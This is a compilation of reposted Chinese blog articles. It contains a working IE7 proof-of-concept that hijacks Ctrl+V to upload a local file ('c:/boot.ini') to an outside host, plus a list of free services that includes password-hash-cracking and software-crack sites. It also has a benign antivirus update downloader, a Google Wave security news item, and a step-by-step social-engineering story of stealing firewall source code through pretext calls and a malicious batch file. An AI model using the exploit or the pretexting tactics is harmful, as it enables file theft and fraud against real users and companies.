Javascript Paste Keyboard Shortcuts Hijack

這樣的攻擊手段也算是極其無恥 猥瑣之極! 所以防禦措施一定要做好

首先說一下通過Javascript Paste Keyboard Shortcuts Hijack能做什麼???能夠讀取你本地機器任何文件! 沒錯!也就是說 你中了任何一個XSS 加上你按了粘貼快捷鍵後,你就有可能被別人讀取你機上任何的文件!

那到底是什麼回事呢? OK 我慢慢來說

首先 我們知道JS是無權限獲讀取你本地任何文件的... 那麼我們必須要讓用戶上傳自己的文件!

怎麼讓用戶上傳呢? 很簡單! 通過 <input type=file > 這樣就能讓用戶上傳文件了!

現在又一個問題是, input 為file的時候 value的值 不能用代碼set進去!必須要讓用戶自己填寫! 必須要通過人機交互!

其實說到這裡!聰明的你大致也應該明白怎麼回事! 接著說! 用戶不可能把自己的文件填寫上去提交給你看的吧?

沒錯~ 那麼 就等待用戶 進行快捷鍵粘貼的時候 哈哈~~說說步驟

1. 判斷是否 進行 ctrl + v

2. 替換粘貼板

3. 光標切換到 文件上傳

4. 善後工作就交給你了 ( 例如如何把上傳textbox透明化,當前頁面不會因表單提交而跳轉 )

IE7 下的 POC :

<HTML>
 <HEAD>
  <TITLE> Javascript Paste Keyboard Shortcuts Hijack </TITLE>
 </HEAD>

<body   onkeydown="temp()">
<input>
<form action="http://learnns.blogspot.com/" method=post name=s>
<input id=kj_filehijack type=file name=fhijack>
</form>
<script>
function temp()
{
    if(event.ctrlKey){
        if(event.keyCode==86){
            window.clipboardData.setData("text","c:/boot.ini");
            document.getElementById('kj_filehijack').focus();
            document.s.submit();
        }
    }
}
</script>

</BODY>
</HTML>

註: 本文轉載自網路 非原創

轉載自 QuantumIntelligence 原文

分享免費/空間動態域名/網盤/IP代理

1，免費動態域名申請
http://www.3322.org 希網
http://comexe.cn/ 科邁
http://www.comexe.cn
http://www.oray.net/ 花生殼
http://www.meibu.com/ 每步
http://ddns.vier.com.cn/ vier

2.免費網盤
http://www.fs2you.com/zh-cn/ 一個相當不錯的免費網絡U盤
http://www.namipan.com/ 納米盤,單文件最大200M。
http://www.live-share.com/
http://www.hack86.com/ 永碩E盤
http://www.vdisk.cn/www/
http://webdisk.cech.com.cn/
http://www.divshare.com/
http://www.esnips.com/
http://www.mediafire.com/
http://www.box.net/
http://skydrive.live.com/
http://www.sharebig.com/
http://www.zupload.com允許上傳500m的文件，幾乎無時限
http://www.putfile.com允許上傳25m的文件
http://www.turboupload.com/允許上傳70m的文件
http://www.wirefiles.com/上傳50M文件
http://www.zshare.net/允許上傳100m的文件，
http://www.yousendit.com/上傳1G文件，保留7天，限制下載次數，可多線程，推薦
http://updownloadserver.com/可以上傳250M的文件，速度不錯
http://upload2.net/以上傳25M的文件，保存時間一年
http://storeandserve.com/可以上傳100M的文件，30天之內有人下載就會一直保留
http://www.ultrashare.net/可以上傳30M的文件，速度還可以
http://www.filefront.com/無限空間，速度比較理想，推薦
http://easy-sharing.com/上傳75M的文件，下載次數不限，30天
http://www.filefactory.com/upload/可以上傳1.5G的文件,保存30天
http://fileupyours.com/上傳200M文件，無限期保存，無限期下載
http://datapickup.com/上傳1.5G文件，保存7天
http://www.transferbigfiles.com/上傳1G文件，保存5天
http://www.megashares.com/上傳1.5G文件，無限制下載
http://ww3.sharebigfile.com/上傳300M文件，可以開多個線程無限制下載，非常好
http://www.spread-it.com/上傳500M文件，30天
http://www.filecache.de/
http://megaupload.com/cn/
http://cn.ziddu.com/

3.在線製作LOGO的網站
http://free.logomaker.cn
http://logo.chinaz.com/
http://www.igogo8.com/
http://jack.asprise.net/software/imggen/generate.php
http://www.feedforall.com/public/rss-graphic-tool.htm

4.漏洞在線查詢網站。
http://www.sebug.net/

5.MD5在線破解網站
http://www.cmd5.com/
http://www.xmd5.org/index_cn.htm
http://md5.rednoize.com/（英文）

6.進程在線查詢
http://www.pcpid.com/
http://www.processlib.net/

7.IP查詢
http://www.ip168.com/
http://members.3322.org/dyndns/getip
http://www.ip138.com/ip2city.asp
http://www.ip168.com/IpInfo.asp?sType=0
http://www.net.cn/static/customercare/yourIP.asp

8.代理查詢
http://www.ipbbs.com/
http://info.hustonline.net/index/proxyshow.aspx（教育網）

9.源碼MD5
http://www.seeknot.com/index.asp

10.程序員之家
http://www.pudn.com/

11.DLL和ocx在線查詢或下載
http://www.dllfile.com/
http://www.dlldump.com/
http://www.ocxdump.com/

12.多引擎免費殺毒網址
http://www.virustotal.com/en/indexf.html
http://virusscan.jotti.org/
http://scanner.virus.org/
http://virscan.org/
http://www.3ctime.cn/shadu/

13.破解碼序列號大全網站
http://www.cracks.am/

14.免費圖片存放
http://www.yupoo.com

15.在線文字圖片生成
http://www.funonit.com
http://www.text-image.com/

16，在線詞典
http://dict.cn/
http://www.dicon.cn/
http://www.iciba.com/
http://www.ourdict.cn/
http://deyu.ohdict.com/
http://www.mydict.com/

17,免費空間
http://fw4.99081.com 動態，無廣告，1G，web管理
http://www.5944.net/ 動態，有廣告，1G，ftp和web管理
http://www.3326.com/ 靜態，無廣告，100M，ftp和web管理
http://www.mianfei.la/ 動態，有廣告，1G ，FTP管理
http://www.tofor.com/ 動態，速度快，沒廣告，50M，FTP管理

18，防火牆測評
http://www.firewallleaktester.com/
http://www.matousec.com/

19，網頁設計（DIV+CSS XHTML模板站和素材）
http://www.oswd.org/
http://www.solucija.com/home/css-templates/
http://www.tristarwebdesign.co.uk/templates.html
http://www.sixshootermedia.com/free-templates/
http://www.openwebdesign.org/
http://www.theyear1986.com/
http://www.80diy.com/
http://www.w3cn.org/
http://www.w3csites.com/

註: 本文轉載自網路 非原創

這篇是朋友從某論壇丟過來的
大家看看吧!

NOD32病毒庫自動更新代碼

最近nod32封殺了不少國內的發布免費ID的站點，使IP查找起來比較麻煩了，索性就用官方發佈的離線升級包弄個更新服務器，自己用。
官方離線升級包下載地址是：http://www.eset.com.cn/html/download/offline.shtml
用vc寫了段代碼，自動下載更新包並解壓至指定目錄，然後指定更新目錄為那個目錄就好了，建一個計劃任務，每天更新一次就實現自動更新了。
以下是簡單的代碼：

// download.cpp : 定義控制台應用程序的入口點。 
//code By:Neeao 
//http://Neeao.com 
#include "stdafx.h" 
#include <windows.h> 
#include <urlmon.h> 
#pragma comment(lib, "urlmon.lib") 

int _tmain(int argc, _TCHAR* argv[]) 
{    
    HRESULT hr=URLDownloadToFile(NULL,"http://down1.eset.com.cn/eset/offlinev2.rar","d:\\offlinev2.rar",0,NULL); 
    SHELLEXECUTEINFO ShExecInfo = {0};  
    ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);  
    ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;  
    ShExecInfo.hwnd = NULL;  
    ShExecInfo.lpVerb = NULL;  
    ShExecInfo.lpFile = "C:\\Program Files\\WinRAR\\RAR.exe"; //調用rar 
    ShExecInfo.lpParameters = "e d:\\offlinev2.rar -o+ D:\\offlinev2\\"; //執行的命令 
    ShExecInfo.lpDirectory = NULL;  
    ShExecInfo.nShow = SW_SHOW;  
    ShExecInfo.hInstApp = NULL;  
    ShellExecuteEx(&ShExecInfo);  
    WaitForSingleObject(ShExecInfo.hProcess,INFINITE);//等解壓縮完畢繼續往下執行 
      return 0; 
} 

註: 本文轉載自網路 非原創

轉載自 Neeao'sBlog 原文

Google Wave security features

Like the overwhelming majority of Google's "products", Google Wave (a real-time communication and collaboration tool) seems to be a really handy and easy-to-use. Having said that, let us concentrate a moment on its security aspects.

IT News reports that Greg D'Alesandre, the product manager of technology, explained that Wave has two features that make your "conversations" secure.

The first one makes sure that the information that travels from server to server can't be intercepted in the middle and "faked", because it comes integrated with authentication information that identifies the sending account.

The second one is the complete encryption of traffic via HTTPS in order to avoid packet sniffing. Users are not even given the option not to use it! Google has decided that in this instance security is more important than speed, and security experts around the world are probably applauding this decision and hoping that this is the beginning of a new way of thinking.

註: 本文轉載自網路 非原創

轉載自 Net-security 原文

社工案例： 誰洩漏的防火牆源代碼？

前景分析：
    22歲的劉昉在高中輟學後，先後做過食品銷售、商場員工、電子設備維護員等，這些經歷使得他精於與各式各樣的人打交道。但在接下來的5年，他瘋狂的迷上了 計算機，尤其對黑客技術感興趣，並涉足了地下黑客經濟。他接的業務很多，如對私服的DDOS、編寫針對性的網銀鍵盤記錄工具、遊戲裝備盜取洗錢等。
    但劉昉對重複性攻擊感到厭倦，顯然，有刺激的事物往往令人更感興趣。這次，他盯上了一套防火牆，由北京中關村恆天公司研發。據說這套防火牆一公佈便在業界大受好評，劉昉則不以為然，在他看來，防火牆的源代碼才能說服他。
一、銷售部門的後門
    劉昉從對外公佈的防火牆軟件中的菜單欄「幫助」處找到了恆天公司銷售部與市場部的聯繫電話，接著他
便以某公司採購部經理的身份撥通了恆天公司銷售部的電話。
    恆天公司（以下簡稱恆）：「您好，這裡是恆天公司銷售部」
    劉漂陽（以下簡稱劉）：「嗯，我是北京亞太機電股份有限公司採購部經理劉漂陽，我們公司需要500份防火牆軟件產品，我參考了網上的防火牆橫向評測，再三考慮後決定選擇你們的產品，現在我想知道你們給我的價格是否令人滿意。」
    恆：「劉經理，我們的防火牆有三種不同的版本，分別為個人版、專業版和企業版。如果你選擇企業版，它的單價是88元，總價為4.4萬；如果你批發購買、那麼價格相對優惠，僅3.2萬。」
    劉：「嗯，沒有高於我們公司原始估價，不過我們公司網絡環境相當複雜，你們公司是否可以定製一套，實現封堵公司員工聊天與下載的功能？」
    恆：「這個……請讓我問問軟件開發部，請稍等。」
    劉：「好的」
    …………
    恆：「久等了，技術員說了，防火牆自帶了過濾功能，只要過濾到相應端口就可以了。」
    劉：「原來是這樣，我沒有問題了，但我們公司網絡管理員建議我把有關內部網絡的文檔發給你，讓你們技術員檢查防火牆的可行性。你有電腦嗎？我想現在就傳送給你，稍後我還有一個會議急需參加。」
    恆：「有的，我的電子郵件是wenyu014@163.com，你現在就發過來？」
    劉：「是的，等一下……（這位「劉漂陽」將一個文件夾與一個批處理文件打包並用郵箱發到指定的郵件
地址）我發過去了，一個壓縮包，你解壓到D盤，要放在D盤才能打開。」
    恆：「嗯，解壓了，是那個「北京亞太機電有點股份公司局域網環境.bat」文件嗎？」
    劉：「對，你可以查看下，看看是否可以打開，可以打開的話，你就發一份給你們技術員」
    恆：「可以打開，只閃了一個黑窗口」
    劉：「好的，三天後我給你答覆」
    恆：「劉經理，再見！」
    計劃很順利，劉昉成功利用社會工程學在恆天公司開啟了一個共享文件夾，文件夾以壓縮包的「WALL」命名，裡面包含了一個文件夾和批處理。不過批處理文件早已自刪除了，其作用就是開啟共享文件夾，並將另一個文件夾中的DOC文檔複製到當前目錄。
    二、合作者的陰謀
    防火牆源代碼是軟件公司的命根子，只有軟件開發人員才得以接觸，但劉昉對這些技術人員一無所知，他需要弄到一些基本信息，以及找一個可信的裡有。這次他以百度市場拓展部經理丁楠的身份撥通了恆天公司市場部的電話。
    市場部：「您好，恆天公司市場部。」
    丁楠：「我是百度拓展部經理丁楠，貴公司有合作的意向嗎？」
    市場部：「百度？是在北京市北四環路58號理想大廈嗎？全球最大的搜索引擎？」
    丁楠：「是的，我們公司計劃整合國內多家尖端軟件產品進行合作，以提升企業形象與影響力，目前國內有三家上市軟件公司參與，不知恆天公司……」
    市場部：「我們恆天企業才運營半年，在業界也暫無廣泛的知名度，能與貴公司合作再好不過了，但合作的決定權不在我們市場部，這個需要內部討論才能再作商議。」
    丁楠：「這樣吧，我給你們恆天公司5天的考慮時間在做決定，如何？」
    市場部：「可以！可以！」
    丁楠：「嗯，你是市場部的負責人嗎？」
    市場部：「是的，市場部，車仁表」
    丁楠：「那麼，車經理，我想瞭解恆天公司的大致情況，雖然我們李彥宏董事長早有此計劃，但我需要一些資料說服部分反對的股東，因此，麻煩提供你們公司整體 運營情況，如季度的銷售額，還有軟件開發人員的資料。關於合作事宜百度公司將於明早八點半開股東大會對此作出決定。」
    市場部：「這麼快？好的，資料我如何發給你呢？」
    丁楠：「發到我的郵箱吧「by1943@qq.com」，最後，我們明早9點聯繫你，如何？」
    市場部：「可以的，謝謝！」
    大概半小時後，劉昉很順利的拿到一份清晰的員工表格，看上去，資料來源於人力資源部。劉昉很確定，恆天公司的市場負責人一定被「合作」沖昏了大腦，竟然把公司財務損益都發過來了。
    三、消失的100萬源代碼
    很自然，劉昉花了幾分鐘社工到信息後，打算冒稱恆天公司市場部另一位負責人王坤，並撥通了恆天公司軟件研發部技術人員劉剛的電話。
    劉剛：「哪位？」
    王坤：「是軟件開發部的劉剛吧？我是市場部負責人王坤，你不久前知道了公司將與百度合作的情況吧？」
    劉剛：「好像是吧，我不確定。」
    王坤：「嗯，百度要投資我們，你所在的服務器工作站打不打算置換？有這個打算的話，我跟財務部小王交涉下」
    劉剛：「換吧！換吧！最近機箱動不動就有怪聲（劉剛對工作站的機子似乎有極度的不滿，迫於企業資金緊張，他也就沒提起，現在是個好機會）」
    王坤：「很好，你把源代碼放到咱們內網做個備份，以免丟失了。嗯，我特意在銷售部的機子開了個共享，你把源碼放上去，下午6點新機器從電腦城元送過來，機器裝好後在刪掉源碼。」
    劉剛：「好的，但是源碼會不會洩漏出去了？（劉剛有些擔心。）」
    王坤：「沒事，現在4點，再過兩小時你就刪掉，而且我們機子都在內網，何況不是還有咱的防火牆嗎？少擔心了，你要對你的防火牆信任！」
    劉剛：「OK！知道了！」  劉剛掛掉了電話。
    緊接著，劉昉再次撥通恆天公司銷售部的電話……
    銷售部：「劉經理？」（一看到號碼，一下就認出來了。）
    劉漂陽：「嗯，我是採購部的劉經理，我在途中想到一件事，所以打電話問一下。」
    銷售部：「請說。」
    劉：「我似乎發錯文件了，除了發給你網絡環境.bat之外，我還發送了其他文件，你檢查一下有沒有多餘的文件？」
    銷售部：「好的，我查查，在D盤的WALL文件夾對吧？」
    劉：「對」
    銷售部：「嗯，在WALL文件夾裡的另一個文件夾包含了一些打不開的文件，你指的是這些嗎？」
    劉：「對，能發給我嗎？那是我其他的採購項目表，需要相應的軟件才能打開。（劉經理很誠懇的解釋。）要是項目表丟了，我的工作也就丟了。」
    銷售部：「這樣啊，不要緊，我馬上打包發到你郵箱裡。（接著是鍵盤的敲打聲……）我發過去了，劉經理，您打開郵箱看一下」
    劉：「收到了，謝謝你了！」
    銷售部：「嗯，沒問題的話我先掛了，劉先生，別忘了防火牆的採購！」
    劉：「好的，再見！」
    就這樣，撥打三次電話的劉昉搞定了防火牆源代碼，不過為什麼銷售部的人說打不開那些文件呢？很簡單，她沒有安裝編程軟件，所以打不開。雖有，劉昉用網名 「神秘小強」將全部的防火牆源代碼公佈在很多黑客論壇……第二天，門戶站報導了這一代碼洩漏事件，網警對此束手無策。

註: 本文轉載自網路 非原創

轉載自 YeZi's Blog 原文